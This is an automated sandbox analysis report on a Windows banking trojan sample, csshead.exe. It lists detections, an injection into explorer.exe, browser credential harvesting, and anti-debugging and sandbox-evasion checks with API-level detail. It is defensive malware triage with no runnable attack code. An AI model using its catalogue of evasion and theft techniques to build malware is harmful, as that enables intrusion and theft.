Analysis Report

Overview

General Information

Joe Sandbox Version: 23.0.0
Analysis ID: 56388
Start time: 13:59:12
Joe Sandbox Product: Cloud
Start date: 04.07.2018
Overall analysis duration: 0h 14m 7s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: csshead.exe
Cookbook file name: default.jbs
Analysis system description: W10 Native physical Machine for testing VM-aware malware (Office 2010, Java 1.8.0_91, Flash 22.0.0.192, Acrobat Reader DC 15.016.20039, Internet Explorer 11, Chrome 55, Firefox 50)
Number of new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.evad.spyw.troj.winEXE@3/14@37/4
HCA Information:
  • Successful, ratio: 61%
  • Number of executed functions: 112
  • Number of non-executed functions: 234
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 33% (good quality ratio 29.4%)
  • Quality average: 80.6%
  • Quality standard deviation: 32.6%
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found application associated with file extension: .exe
Warnings:
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy    Score   Range     Reporting        Detection
Threshold   100     0 - 100   Report FP / FN   malicious

Confidence

Strategy    Score   Range     Further Analysis Required?   Confidence
Threshold   5       0 - 5     false

Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis
Signature Overview

AV Detection:

Antivirus detection for submitted file
  Source: csshead.exe | Avira: Label: TR/Spy.Bebloh.ymgcn
Multi AV Scanner detection for submitted file
  Source: csshead.exe | virustotal: Detection: 46%
Antivirus detection for unpacked file
  Source: 0.2.csshead.exe.50000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
  Source: 1.2.explorer.exe.490000.5.unpack | Avira: Label: TR/Crypt.XPACK.Gen
  Source: 1.2.explorer.exe.7c0000.6.unpack | Avira: Label: TR/Crypt.XPACK.Gen
  Source: 0.2.csshead.exe.400000.1.unpack | Avira: Label: HEUR/AGEN.1023574
  Source: 0.0.csshead.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
  Source: 0.1.csshead.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen
Yara signature match
  Source: 00000001.00000002.28504861757.007C0000.00000040.sdmp, type: MEMORY | Matched rule: IMPLANT_4_v10 author = US CERT, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, description = BlackEnergy / Voodoo Bear Implant by APT28, date = 2017-02-10, score =
  Source: 00000000.00000002.27490223943.00050000.00000004.sdmp, type: MEMORY | Matched rule: IMPLANT_4_v10 author = US CERT, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, description = BlackEnergy / Voodoo Bear Implant by APT28, date = 2017-02-10, score =
  Source: 0.2.csshead.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: IMPLANT_4_v10 author = US CERT, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, description = BlackEnergy / Voodoo Bear Implant by APT28, date = 2017-02-10, score =
  Source: 0.2.csshead.exe.50000.0.unpack, type: UNPACKEDPE | Matched rule: IMPLANT_4_v10 author = US CERT, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, description = BlackEnergy / Voodoo Bear Implant by APT28, date = 2017-02-10, score =
  Source: 1.2.explorer.exe.7c0000.6.unpack, type: UNPACKEDPE | Matched rule: IMPLANT_4_v10 author = US CERT, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, description = BlackEnergy / Voodoo Bear Implant by APT28, date = 2017-02-10, score =
  Source: 1.2.explorer.exe.7c0000.6.raw.unpack, type: UNPACKEDPE | Matched rule: IMPLANT_4_v10 author = US CERT, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, description = BlackEnergy / Voodoo Bear Implant by APT28, date = 2017-02-10, score =
  Source: 0.2.csshead.exe.50000.0.raw.unpack, type: UNPACKEDPE | Matched rule: IMPLANT_4_v10 author = US CERT, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, description = BlackEnergy / Voodoo Bear Implant by APT28, date = 2017-02-10, score =

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004017A2 CryptDecrypt,CryptDecrypt
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0040153C CryptGenRandom,CryptGenRandom
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401402 CryptHashData,CryptHashData
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004017A4 CryptDecrypt,CryptDecrypt
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401AAE CryptEncrypt,CryptEncrypt
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004017E8 CryptAcquireContextA,CryptAcquireContextA
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401574 CryptSetKeyParam,CryptSetKeyParam
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401AB0 CryptEncrypt,CryptEncrypt
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401374 CryptCreateHash,CryptCreateHash
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004018A0 CryptImportKey,CryptImportKey
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004014D0 CryptDestroyHash,CryptDestroyHash
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401490 CryptGetHashParam,CryptGetHashParam
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401404 CryptHashData,CryptHashData
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401AF8 CryptDestroyKey,CryptDestroyKey
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401B20 CryptReleaseContext,CryptReleaseContext
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C17E8 CryptAcquireContextA,CryptAcquireContextA
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C18A0 CryptImportKey,CryptImportKey
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C153C CryptGenRandom,CryptGenRandom
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C17A4 CryptDecrypt,CryptDecrypt
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C1574 CryptSetKeyParam,CryptSetKeyParam
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C1AB0 CryptEncrypt,CryptEncrypt
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C1404 CryptHashData,CryptHashData
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C1374 CryptCreateHash,CryptCreateHash
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C17A2 CryptDecrypt,CryptDecrypt
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C1B20 CryptReleaseContext,CryptReleaseContext
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C1402 CryptHashData,CryptHashData
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C1AAE CryptEncrypt,CryptEncrypt
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C1490 CryptGetHashParam,CryptGetHashParam
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C1AF8 CryptDestroyKey,CryptDestroyKey
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C14D0 CryptDestroyHash,CryptDestroyHash

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004018A0 CryptImportKey,CryptImportKey
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C18A0 CryptImportKey,CryptImportKey

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
  Source: csshead.exe, 00000000.00000002.27490890262.00599000.00000004.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Drops certificate files (DER)
  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_FDB452422670E72EDD3FB3D65568F821
  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F5F320A94D4D2B4465D8F17E2BB2D351_0BA94B3A3CB67F245E2A70E0B581D64B
  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08
  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A9311CC87BA03C7CB180095ACB967E37

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 4x nop then pop ecx (0_2_00409178)
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 4x nop then pop ecx (0_2_00409147)
  Source: C:\Windows\explorer.exe | Code function: 4x nop then pop ecx (1_2_007C9178)
  Source: C:\Windows\explorer.exe | Code function: 4x nop then pop ecx (1_2_007C9147)

Networking:

Queries random domain names (often used to prevent blacklisting and sinkholes)
  Source: unknown | DNS traffic detected: English language letter occurrence does not match the domain names
Tries to resolve many domain names, but no domain seems valid
Connects to many different domains
  Source: unknown | Network traffic detected: DNS query count 36
Contains functionality to upload files via FTP
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00419D20 CoInitialize,NtdllDefWindowProc_A,GetCommandLineA,CreateMenu,LoadMenuA,LoadMenuA,LoadBitmapA,AppendMenuA,LoadMenuA,BeginDeferWindowPos,CreateMetaFileA,SetBrushOrgEx,LoadImageA,FtpPutFileEx,GetSysColorBrush,FrameRect,GlobalAlloc,GetLastError,GetIconInfo,GetIconInfo,GetDIBits,GetDIBits,GetDIBits,GetDIBits,GetDIBits,SetWindowContextHelpId,GetDlgItem,GetDlgItem,SetWindowContextHelpId,mmioSetInfo,mmioAscend,GetSystemInfo,CloseHandle,GetSystemTimeAsFileTime,SetConsoleCtrlHandler,CreateFileA,CreateIoCompletionPort,CopyImage,DrawMenuBar,FindResourceA,VirtualAlloc,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIco
IP address seen in connection with other malware
  Source: Joe Sandbox View | IP Address: 23.10.249.152
Contains functionality to download additional files from the internet
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C15B0 InternetReadFile
Downloads files from webservers via HTTP
  Source: global traffic | HTTP traffic detected: GET /gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D HTTP/1.1; Connection: Keep-Alive; Accept: */*; User-Agent: Microsoft-CryptoAPI/10.0; Host: ocsp.pki.goog
  Source: global traffic | HTTP traffic detected: GET /GTSGIAG3/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCCCIrzM%2FKFFw%2B HTTP/1.1; Connection: Keep-Alive; Accept: */*; User-Agent: Microsoft-CryptoAPI/10.0; Host: ocsp.pki.goog
  Source: global traffic | HTTP traffic detected: GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBR%2B5mrncpqz%2FPiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7%2FOo7KECEgO54qVnGaYpxjBEoQUm57uvQQ%3D%3D HTTP/1.1; Connection: Keep-Alive; Accept: */*; User-Agent: Microsoft-CryptoAPI/10.0; Host: ocsp.int-x3.letsencrypt.org
Performs DNS lookups
  Source: unknown | DNS traffic detected: queries for: www.google.com
Urls found in memory or binary data
  Source: E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08.1.dr | String found in binary or memory: http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUx
  Source: F5F320A94D4D2B4465D8F17E2BB2D351_0BA94B3A3CB67F245E2A70E0B581D64B.1.dr | String found in binary or memory: http://ocsp.pki.goog/GTSGIAG3/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndn
  Source: CFE86DBBE02D859DC92F1E17E0574EE8_FDB452422670E72EDD3FB3D65568F821.1.dr | String found in binary or memory: http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBq
  Source: csshead.exe, explorer.exe | String found in binary or memory: https://
Uses HTTPS
  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49686
  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49687
  Source: unknown | Network traffic detected: HTTP traffic on port 49684 -> 443
  Source: unknown | Network traffic detected: HTTP traffic on port 49687 -> 443
  Source: unknown | Network traffic detected: HTTP traffic on port 49686 -> 443
  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49684

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
  Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\p61isjuj.default\prefs.js

Data Obfuscation:

Contains functionality to dynamically determine API calls
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401928 LoadLibraryA,GetProcAddress
Uses code obfuscation techniques (call, push, ret)
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0040949C push 004094C8h; ret 0_2_004094C0
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004094E0 push 00409506h; ret 0_2_004094FE
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0040103C push 00401068h; ret 0_2_00401060
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0040107C push 004010A8h; ret 0_2_004010A0
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00429267 push ebx; ret 0_2_00429268
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00434271 push eax; retf 0_2_00434272
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00429F35 push ecx; ret 0_2_00429F48
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00434F2B pushad ; iretd 0_2_00434F2C
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00432D21 pushfd ; retf 0043h 0_2_00432D22
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C949C push 007C94C8h; ret 1_2_007C94C0
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C103C push 007C1068h; ret 1_2_007C1060
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C107C push 007C10A8h; ret 1_2_007C10A0
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C94E0 push 007C9506h; ret 1_2_007C94FE
Sample is packed with UPX
  Source: initial sample | Static PE information: section name: UPX0
  Source: initial sample | Static PE information: section name: UPX1

Spreading:

Contains functionality to enumerate / list files inside a directory
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00403988 FindFirstFileA,FindClose
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00405640 SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C5640 SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C3988 FindFirstFileA,FindClose

System Summary:

Contains functionality to call native functions
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00404E94 NtQueryInformationProcess,ReadProcessMemory
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00408A48 PostQuitMessage,NtdllDefWindowProc_A
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00404DE0 NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00408A44 NtdllDefWindowProc_A
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00419D20 CoInitialize,NtdllDefWindowProc_A,GetCommandLineA,CreateMenu,LoadMenuA,LoadMenuA,LoadBitmapA,AppendMenuA,LoadMenuA,BeginDeferWindowPos,CreateMetaFileA,SetBrushOrgEx,LoadImageA,FtpPutFileEx,GetSysColorBrush,FrameRect,GlobalAlloc,GetLastError,GetIconInfo,GetIconInfo,GetDIBits,GetDIBits,GetDIBits,GetDIBits,GetDIBits,SetWindowContextHelpId,GetDlgItem,GetDlgItem,SetWindowContextHelpId,mmioSetInfo,mmioAscend,GetSystemInfo,CloseHandle,GetSystemTimeAsFileTime,SetConsoleCtrlHandler,CreateFileA,CreateIoCompletionPort,CopyImage,DrawMenuBar,FindResourceA,VirtualAlloc,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIco
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00410210 NtdllDefWindowProc_A
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00421360 NtdllDefWindowProc_A
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00410190 IsWindow,GetWindowLongA,SetWindowLongA,NtdllDefWindowProc_A
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00417E60 GetWindowLongA,GetWindowLongA,GetWindowLongA,SetWindowLongA,NtdllDefWindowProc_A
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0041E9C0 SendMessageA,IsWindow,IsWindow,IsWindow,GetWindowLongA,SetWindowLongA,NtdllDefWindowProc_A
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00417ED0 GetWindowLongA,GetWindowLongA,GetWindowLongA,SetWindowLongA,GetWindowLongA,OleUninitialize,OleInitialize,GetWindowTextLengthA,GetWindowTextA,SetWindowTextA,GlobalAlloc,GlobalFix,GlobalUnWire,lstrlen,SetWindowLongA,NtdllDefWindowProc_A
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00418620 NtdllDefWindowProc_A
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00410810 NtdllDefWindowProc_A
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00421620 NtdllDefWindowProc_A
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00418190 GetWindowLongA,GetWindowLongA,GetWindowLongA,SetWindowLongA,GetWindowLongA,OleUninitialize,OleInitialize,GetWindowTextLengthA,GetWindowTextA,SetWindowTextA,GlobalAlloc,GlobalFix,GlobalUnWire,SysFreeString,lstrlen,SysFreeString,SetWindowLongA,SysFreeString,NtdllDefWindowProc_A
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C8A48 PostQuitMessage,NtdllDefWindowProc_A
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C4E94 NtQueryInformationProcess,ReadProcessMemory
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C4DE0 NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C8A44 NtdllDefWindowProc_A
Detected potential crypto function
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00405D20
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00419D20
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0041C95B
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0043256D
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00430D58
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00423AD0
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00430807
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004302B6
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0042E76B
  Source: C:\Windows\explorer.exe | Code function: 1_2_007C5D20
PE file contains strange resources
  Source: csshead.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts file
  Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample file name is different from the original file name gathered from version info
  Source: csshead.exe, 00000000.00000001.27391130383.00456000.00000008.sdmp | Binary or memory string: OriginalFilenametemplate.exeJ vs csshead.exe
  Source: csshead.exe | Binary or memory string: OriginalFilenametemplate.exeJ vs csshead.exe
Sample reads its own file content
  Source: C:\Users\user\Desktop\csshead.exe | File read: C:\Users\user\Desktop\csshead.exe
Tries to load missing DLLs
  Source: C:\Users\user\Desktop\csshead.exe | Section loaded: open.dll
Classification label
  Source: classification engine | Classification label: mal100.evad.spyw.troj.winEXE@3/14@37/4
Contains functionality to load and extract PE file embedded resources
  Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00419D20 CoInitialize,NtdllDefWindowProc_A,GetCommandLineA,CreateMenu,LoadMenuA,LoadMenuA,LoadBitmapA,AppendMenuA,LoadMenuA,BeginDeferWindowPos,CreateMetaFileA,SetBrushOrgEx,LoadImageA,FtpPutFileEx,GetSysColorBrush,FrameRect,GlobalAlloc,GetLastError,GetIconInfo,GetIconInfo,GetDIBits,GetDIBits,GetDIBits,GetDIBits,GetDIBits,SetWindowContextHelpId,GetDlgItem,GetDlgItem,SetWindowContextHelpId,mmioSetInfo,mmioAscend,GetSystemInfo,CloseHandle,GetSystemTimeAsFileTime,SetConsoleCtrlHandler,CreateFileA,CreateIoCompletionPort,CopyImage,DrawMenuBar,FindResourceA,VirtualAlloc,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadIconA,LoadIco
Creates files inside the user directory
  Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_FDB452422670E72EDD3FB3D65568F821
Launches a second explorer.exe instance
  Source: unknown | Process created: C:\Windows\explorer.exe
  Source: C:\Users\user\Desktop\csshead.exe | Process created: C:\Windows\explorer.exe
Might use command line arguments
  Source: C:\Users\user\Desktop\csshead.exe | Command line argument: Menu (0_2_00419D20)
  Source: C:\Users\user\Desktop\csshead.exe | Command line argument: Bitmap (0_2_00419D20)
  Source: C:\Users\user\Desktop\csshead.exe | Command line argument: Edit (0_2_00419D20)
  Source: C:\Users\user\Desktop\csshead.exe | Command line argument: WAV (0_2_00419D20)
  Source: C:\Users\user\Desktop\csshead.exe | Command line argument: open (0_2_00419D20)
  Source: C:\Users\user\Desktop\csshead.exe | Command line argument: Profile (0_2_00419D20)
  Source: C:\Users\user\Desktop\csshead.exe | Command line argument: .icm (0_2_00419D20)
  Source: C:\Users\user\Desktop\csshead.exe | Command line argument: @G@ (0_2_00419D20)
Reads software policies
Source: C:\Users\user\Desktop\csshead.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: csshead.exe | virustotal: Detection: 46%
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\csshead.exe 'C:\Users\user\Desktop\csshead.exe'
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\csshead.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Binary contains paths to debug symbols
Source: Binary string: Ihs.pdb | source: csshead.exe
Source: Binary string: C:\As\Release\2000s.pdb | source: csshead.exe

HIPS / PFW / Operating System Protection Evasion:

Injects code into the Windows Explorer (explorer.exe)
Source: C:\Users\user\Desktop\csshead.exe | Memory written: PID: 3160 base: B0000 value: 43
Source: C:\Users\user\Desktop\csshead.exe | Memory written: PID: 3160 base: 3D81E8 value: 00
Source: C:\Users\user\Desktop\csshead.exe | Memory written: PID: 3160 base: EC46B0 value: 55
Writes to foreign memory regions
Source: C:\Users\user\Desktop\csshead.exe | Memory written: C:\Windows\explorer.exe base: EC46B0
Contains functionality to add an ACL to a security descriptor
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00404406 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree | 0_2_00404406
Contains functionality to create a new security descriptor
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004041C8 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,AllocateAndInitializeSid,EqualSid,FreeSid | 0_2_004041C8

Anti Debugging:

Found API chain indicative of debugger detection
Source: C:\Users\user\Desktop\csshead.exe | Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep | graph_0-19518
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004010B4 rdtsc | 0_2_004010B4
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00406D40 IsDebuggerPresent | 0_2_00406D40
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004239DD VirtualProtect ?,-00000001,00000104,? | 0_2_004239DD
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401928 LoadLibraryA,GetProcAddress | 0_2_00401928
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_004024F8 mov eax, dword ptr fs:[00000030h] | 0_2_004024F8
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_01821560 mov eax, dword ptr fs:[00000030h] | 0_2_01821560
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_01823134 mov eax, dword ptr fs:[00000030h] | 0_2_01823134
Source: C:\Windows\explorer.exe | Code function: 1_2_007C24F8 mov eax, dword ptr fs:[00000030h] | 1_2_007C24F8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00401460 GetProcessHeap,RtlReAllocateHeap | 0_2_00401460
Contains functionality to register its own exception handler
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_0042CA48 SetUnhandledExceptionFilter | 0_2_0042CA48
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00424FEB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_00424FEB
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00429814 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 0_2_00429814

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\csshead.exe | Code function: 0_2_00406B18 | 0_2_00406B18
Source: C:\Windows\explorer.exe | Code function: 1_2_007C6B18 | 1_2_007C6B18
Contains functionality to detect sleep reduction / modifications
Source: C:\Windows\explorer.exe | Code function: 1_2_007C6DB0 GetTickCount,Sleep,GetTickCount | 1_2_007C6DB0
